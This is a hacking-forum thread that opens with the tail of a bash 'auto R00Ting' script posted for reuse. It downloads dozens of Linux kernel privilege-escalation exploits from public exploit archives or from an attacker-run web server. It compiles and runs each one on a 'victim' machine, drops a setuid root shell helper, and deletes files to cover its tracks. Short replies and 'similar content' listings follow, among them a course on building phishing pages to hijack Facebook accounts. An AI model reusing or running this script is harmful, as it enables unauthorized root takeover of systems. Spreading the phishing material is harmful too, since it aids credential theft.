          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
          sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

          # Getting 32-bit only exploit to lin_x86 directory
          cd /var/www/html/exploits/lin_x86/local

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

          # Getting the compressed exploits to sploits directory
          cd /var/www/html/exploits/sploits

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
          sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
          sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

          # Getting CVE-2016-2384 exploit to gitex directory 
          cd /var/www/html/exploits/gitex

          echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

          sudo wget --no-check-certificate $gitaddress/poc.c
          sudo wget --no-check-certificate $gitaddress/poc.py
      }

      function valid_ip()
      {
          if ! [ "$2" ]; then
              echo -e "${red}${bold}IP Not Provided, Please provide an IP"
          else
              if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

                  for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
                  do
                    (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
                  done
              else
                  echo -e "${light_green}========================================"
                  echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
                  echo -e "========================================"
                  exit 1;
              fi
          fi
      }

      #gaddress=$1'/exploits'
      #saddress=$1'/exploits'
      #gitaddress=$1'/exploits/gitex'
      function exploiter(){

          checkroot() {
              if [ $(id -u) == 0 ]; then
              echo
              echo -e "${light_red}Successfully R00T(ed).. have fun :)"
              id=$(id)
              echo -e "${light_red}ID     => ${light_green}" $id
              who=$(whoami)
              echo -e "${light_red}WHOAMI => ${light_green}" $who
              exit
              else
              echo ""
              echo -e "${light_red}R00Ting.. ${light_green}"
              sleep 1
              fi
          }
          ccmpl(){
              gcc exploit.c -o exploit -lutil -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -m32 -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -O2 -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lkeyutils -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -lpthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -pthread
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -static -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc exploit.c -o exploit -Wall
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -fPIC -shared -o exploit exploit.c -ldl -w
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -O2 exploit.c
              gcc -O2 -fomit-frame-pointer exploit.c -o exploit
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -o exploit exploit.c -static -O2
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -pthread exploit.c -o exploit -lcrypt
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -m64 -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
              gcc -Wall -o exploit exploit.c
              ./exploit
              ./a.out
              rm exploit
              rm exploit.c
              rm a.out
              checkroot;
          }
          shcmpl(){
              bash exploit.sh
              rm exploit.sh
              rm *.c
              checkroot;
          }
          pycmpl(){
              python exploit.py
              rm exploit.py
              rm *.c
              checkroot;
          }
          echo -e "${light_red}Auto R00Ting started...${light_green}"

          checkroot;
          #c
          wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
          ccmpl;
          wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
          ccmpl;

          #sh
          wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
          shcmpl;
          wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
          shcmpl;

          #py
          wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
          pycmpl;
          wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
          pycmpl;

          #txt
          #platforms/linux/local/9191.txt
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/39772.txt
          wget --no-check-certificate $saddress/bin-sploits/39772.zip
          cd 39772
          unzip 39772.zip
          tar -xf exploit.tar
          cd ebpf_mapfd_doubleput_exploit
          bash compile.sh
          ./hello
          ./doubleput
          ./suidhelper
          cd ..
          rm -rf ebpf_mapfd_doubleput_exploit
          rm -rf exploit.tar
          checkroot;
          tar -xf crasher.tar
          cd ebpf_mapfd_doubleput_crasher
          bash compile.sh
          ./doubleput
          cd ..
          rm -rf ebpf_mapfd_doubleput_crasher
          rm -rf 39772
          rm -rf 39772.zip
          checkroot;
          #platforms/linux/local/23674.txt
          smbmount --version
          ls -l /usr/bin/smbmount
          ls -l /usr/bin/smbmnt
          echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
          make a
          cc a.c -o a
          chmod +s a
          share:/etc/samba/smb.conf
          /etc/samba/smb.conf
          [share]
          path = /data/share
          writable = no
          locking = no
          public = yes
          guest ok = yes
          comment = Share
          ls -l a
          ls -l pokus/a
          id
          checkroot;
          #platforms/linux/local/29714.txt
          wget --no-check-certificate $saddress/bin-sploits/29714.tgz
          tar -zxf 29714.tgz
          cd exploit
          make
          make install
          cd ..
          rm -rf exploit
          rm -rf 29714.tgz
          checkroot;
          wget --no-check-certificate $saddress/bin-sploits/9191.tgz
          tar -zxf 9191.tgz
          cd cheddar_bay
          bash cheddar_bay.sh
          cc -fno-stack-protector -o exploit exploit.c
          ./exploit
          cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
          ./exploit
          cd ..
          rm -rf cheddar_bay
          rm -rf 9191.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          checkroot;
          #platforms/linux/local/33395.txt
          wget $saddress/bin-sploits/33395.tgz
          tar -zxf 33395.tgz
          cd ext4_own
          bash ext4_own.sh
          checkroot;
          cd ..
          rm -rf ext4_own
          rm -rf 33395.tgz
          #platforms/linux/local/40489.txt
          wget --no-check-certificate $saddress/bin-sploits/40489.zip
          unzip 40489.zip
          cd 40489
          bash compile.sh
          ./pwn
          ./enjoy
          cd ..
          rm -rf 40489
          rm -rf 40489.zip
          checkroot;
          #platforms/linux/local/41770.txt
          # #!/bin/bash
          # (./ProcReadHelper /proc/$$/syscall) &
          # sleep 1
          # exec /usr/bin/passwd
          # #!/bin/bash
          # echo "Current pid is $$"
          # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
          # sleep 5
          # exec /usr/bin/passwd
          # static ssize_t mem_read(struct file * file, char __user * buf,
          #                         size_t count, loff_t *ppos) {
          #     if (file->private_data != (void*)((long)current->self_exec_id))
          #         goto out_put;
          # #!/bin/bash
          # (sleep 3; echo 15) > /proc/$$/oom_adj &
          # exec /usr/bin/passwd
          # checkroot;
          #platforms/linux/local/38559.txt
          rmmod b43
          modprobe b43 fwpostfix=AA%xBB
          dmesg
          checkroot;
          #platforms/linux/local/41999.txt
          wget --no-check-certificate $gitaddress/poc.c -O poc.c
          gcc poc.c -masm=intel
          ./a.out 0
          checkroot;
          ./a.out 1
          checkroot;
          ./a.out 2
          checkroot;
          ./a.out 3
          checkroot;
          ./a.out 4
          checkroot;
          ./a.out 5
          checkroot;
          ./a.out 6
          checkroot;
          ./a.out 7
          checkroot;
          ./a.out 8
          checkroot;
          ./a.out 9
          checkroot;
          ./a.out 10
          checkroot;
          rm a.out
          rm poc.c
          wget --no-check-certificate $gitaddress/poc.py -O poc.py
          python poc.py
          checkroot;
          rm poc.py
          rm a.out
          rm exploit
          
          echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
          exit 1;
      }


      if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
          lauto_root
          desc
      fi

      if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
          lauto_root
          sleep 2 
          echo -e "\n${light_green}=================================="
          echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
          echo -e "==================================\n"
          # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
          gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
          local_dir
          arsenal
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
          echo -e "==========================\n"
          echo -e "${light_green}=========================="
          echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
          echo -e "==========================\n"
          /bin/bash -i /etc/init.d/apache2 start
          /bin/bash -i /etc/init.d/apache2 status
          echo -e "${light_green}=================================="
          echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
          echo -e "==================================\n"

          exit 1;
      fi 

      if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
          lauto_root
          if ! [ "$2" ]; then
              echo -e "\n${light_red}No IP address provided!!!\n"
              exit 1;
          else     
              ip=$2
          fi

          if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

              for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
              do
                (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
              done
          else
              echo -e "${light_green}========================================"
              echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
              echo -e "========================================\n"
          fi    

          sleep 2 
          echo -e "${light_green}=================================="
          echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
          echo -e "==================================\n"
          gaddress='http://'${ip}'/exploits'
          saddress='http://'${ip}'/exploits'
          gitaddress='http://'${ip}'/exploits/gitex'
          exploiter
          exit 1;
      fi

      if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
          lauto_root
          gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
          saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
          sleep 2 
          echo -e "${light_green}==================================="
          echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
          echo -e "===================================\n"
          exploiter
          exit 1;
      fi


       

      thanks for share

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Edited by dEEpEst
      No emails in public

      Share this post


      Link to post
      Share on other sites
      10 hours ago, bash818 said:

      Excellent a fellow bash coder, add me => MODERATED BY ADMIN (jabber)

      Ive got some "HQ" stuff to show you.

      Its a jabber..

      Share this post


      Link to post
      Share on other sites
      Staff
      hace 2 horas, bash818 dijo:

      Its a jabber..

      @bash818 You can not put emails in the forum, or jabbers or anything similar. If you want to contact him use the private message.
      You should know the rules.:close_tema:

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.

      • Similar Content

        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Difficulty: Beginners
          Format: Video MP4 [Full HD 1920x1080p]
          Download Size: 73 MB
          Duration: 13:05
          Language: Hindi – Urdu
          Operating System Used: Kali Linux
          About The Course :
          Over Wan Facebook Record Hacking utilizing phishing page Free Download.

          In this video instructional exercise: I am telling you the best way to make the phishing page of any site in Kali Linux? Step by step instructions to utilize phishing page over wan for record hacking any social locales like Facebook, Twitter, and so on.

          Very simple strides in Hindi without utilizing a computerized content or instruments.
          1.   Phishing Social engineering techniques.
          2.   Creating a phishing web page of any website.
          3.   Account hacking using phishing.
          4.   How to be safe from a phishing attack.

          Note: This video is training purposes as it were. We don't advance, empower, support or energize any criminal behavior or hacking. We can't be considered answerable for any abuse of the given data.

          Phishing assaults: Watch out for these indications that you've been sent to a fake site:
          The quantity of phishing assaults keeps on rising and digital lawbreakers are utilizing some exceptionally basic strategies to guarantee that their malignant messages sidestep security insurances and stunt unfortunate casualties into downloading malware, giving over their login certifications and that's only the tip of the iceberg.
          Specialists at cybersecurity organization IronScales analyzed more than 25,000 malignant messages that had skirted inbox security over a multi-month time frame and found that instead of utilizing propelled systems, a considerable lot of the assaults were just diverting clients to counterfeit sites.
          Frequently, these destinations act like enormous brand organizations like Microsoft, PayPal, banks, and retailers, and urge clients to enter individual qualifications. In Ife client gives this data, it falls under the control of the digital crooks who can utilize it in any capacity they wish, either for submitting extortion and robbery themselves or selling the accreditations on to others on underground gatherings.
          SEE: 10 hints for new cybersecurity masters (free PDF)
          Be that as it may, assessment of the phishing sites found that there are normally some indication that the page is a phony – in any event when the destinations were intended to seem as though duplicates of the organization they're mirroring.
          In practically 50% of cases, pictures on the site were obscured and out of center – a sign that the pictures have been screen-snatched or generally duplicated from the genuine article and set on a phony. In a fourth of cases, the picture had been resized and seemed extended or lengthened.
          In both of these cases, it's generally a sign that something isn't right.
          In the meantime in around 15% of cases, fake locales are planned so that they appear to be unique to the genuine form; by and large, these phony points of arrival make themselves look like having had an update.
          In around one out of ten cases, the phishing page looks practically authentic, however, assailants have picked obsolete symbolism or informing on their phony site. This can occur if an organization has changed its logo or marking and the assailants haven't focused on the sites they're attempting to mirror.
          In 5% of cases, the phishing site will look and sound a ton like the organization the aggressors are attempting to mirror, however, shows an extraordinary desire to move quickly for the guest, be it a danger of something has turned out badly, or revealing to them they have to enter their subtleties promptly to get to their record.
          Scientists state that by and large, people groups miss these hints and succumb to phishing sites because of purposeful visual impairment: when they don't see a sudden change, in any event, when it's covered up on display.
          Be that as it may, if clients put shortly inspecting conceivably suspicious messages and sites, away from the messages or the website page being bogus can rapidly rise.
          SEE: This new Android malware comes camouflaged as a talk application
          Also, if clients truly think they have to enter their certifications, it's prescribed that they go legitimately to the site that the email professes to connection to, to stay away from the probability of clicking a vindictive think and giving their subtleties to assailants.
          Also, if this occurs in the professional workplace, the best activity is to make your data security group mindful of anything suspicious or surprising.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Security Onion
          Security Onion is a free and open source Linux distribution for intrusion detection, enterprise security monitoring, and log management. It includes Elasticsearch, Logstash, Kibana, Snort, Suricata, Bro, OSSEC, Sguil, Squert, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!
          Below are several diagrams to represent the current architecture and deployment scenarios for Security Onion on the Elastic Stack.
          Changelog v2.3.61
              FIX: Airgap link to Release Notes #4685
              FIX: CyberChef unable to load due to recent Content Security Policy restrictions #4885
              FIX: Suricata dns.response.code needs to be renamed to dns.response.code_name #4770
              UPGRADE: alpine 3.12.1 to latest for Fleet image #4823
              UPGRADE: Elastic 7.13.4 #4730
              UPGRADE: Zeek 4.0.3 #4716

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. What is it?
          BackBox is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer. All this using exclusively Free Open Source Software, demonstrating the potential and power of the Community. If you’d like to know more feel free to navigate in our web site and get in touch with us.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. About The Project
          The purpose of the Whoami tool makes you as anonymous as possible on Kali linux. It is an user friendly with its ease of use and simple interface. It follows two different paths to ensure the highest possible level of anonymity.
          Finally, don't forget that there is never a hundred percent security on the internet!
          Features
              Anti mitm
              Log killer
              IP changer
              Dns changer
              Mac changer
              Anti cold boot
              Timezone changer
              Hostname changer
              Browser anonymization

          Hidden Content
          Give reaction to this post to see the hidden content.
          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Safeguard your network and websites with Kali Linux by identifying vulnerabilities and tackling them on Windows platform
          What you'll learn
              Detect vulnerable ports and learn how to exploit them
              Pentest your website and hack data with different types of attacks
              Crack passwords to gain elevated access to resources
              Exploit well-known Windows vulnerabilities.
              Create persistent access to an exploited machine and maintain a stable backdoor.
              Collect valuable information from the exploited host.
          Requirements
              Basic understanding of penetration testing would be an advantage
          Description
          Kali Linux is the premier platform for testing and maintaining Windows security. Managing Windows security has always been a challenge for any security professional. As Windows is the most popular operating system in the corporate environment, this course will help you detect and tackle attacks early to save your organization data and money.
          With this practical course, you will start off with learning how to gather information about the target network and websites to discover all the vulnerable ports. Once you find the necessary info, you’ll learn to bypass security restrictions using exploitation tools to access the target system, hack websites using various pentesting tools. Moving further you'll be mastering master various exploitation and post exploitation techniques such as Pass-The-Hash techniques.
          By the end of this video tutorial, you will be able to successfully identify and tackle the flaws and vulnerabilities within the Windows OS (versions 7, 8.1, 10) using Metasploit and Kali Linux tools & collect valuable information from the exploited host.
          Contents and Overview
          This training program includes 2 complete courses, carefully chosen to give you the most comprehensive training possible.
          The first course, Learning Windows Penetration Testing Using Kali Linux you’ll start by gathering information about the target network and websites to discover all the vulnerable ports. Moving on, you’ll learn to bypass security restrictions using exploitation tools to access the target system. Also, you’ll hack websites using various pentesting tools and learn how to present your test reports. By the end of the course, you’ll be able to find, exploit, and prevent security vulnerabilities in Windows OS using Kali Linux.
          The second course, Practical Windows Penetration Testing will follow a typical penetration test scenario throughout. At each stage, you will be shown all the necessary tools and techniques, and how they are applied. The whole course is hands-on to guarantee that you gain practical knowledge. You will start by setting up the environment and learn service identification and network scanning techniques. You will master various exploitation and post exploitation techniques. You will also learn to proxy traffic and implement the most famous hacking technique: the pass-the-hash attack. By the end of this video tutorial, you will be able to successfully identify and tackle the flaws and vulnerabilities within the Windows OS (versions 7, 8.1, 10) using Metasploit and Kali Linux tools.
          About the Authors:
              Taking education on security to a completely new level, Angelique Keyter is devoted to making a difference in the world of cybercrime. She has numerous years of hacking and lecturing behind her and focuses her time on making a difference in her community and teaching people how to fight an unseen criminal. Angelique is a certified hacker, Linux professional, and Microsoft solutions expert with more than 20 years of experience. She is a mother of twins and spends a lot of time studying new things and learning new concepts. She believes that you are never too old to learn. She has a passion for gaming and geeky stuff from hacking to robotics to forensic psychology. She is a focused person with a witty sense of humor, always ready to help or play football with her boys.

              Gergely Révay, the instructor of this course, hacks stuff for fun and profit at Multinational Corporation in Germany and in the USA. He has worked as a penetration tester since 2011; before that, he was a quality assurance engineer in his home country, Hungary. As a consultant, he did penetration tests and security assessments in various industries, such as insurance, banking, telco, mobility, healthcare, industrial control systems, and even car production.
          Who this course is for:
              This course is for IT professionals, security enthusiasts, and security professionals who are willing to learn how to find, exploit, and prevent security vulnerabilities in Windows OS using Kali Linux as well as penetration testing on the Windows platform.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.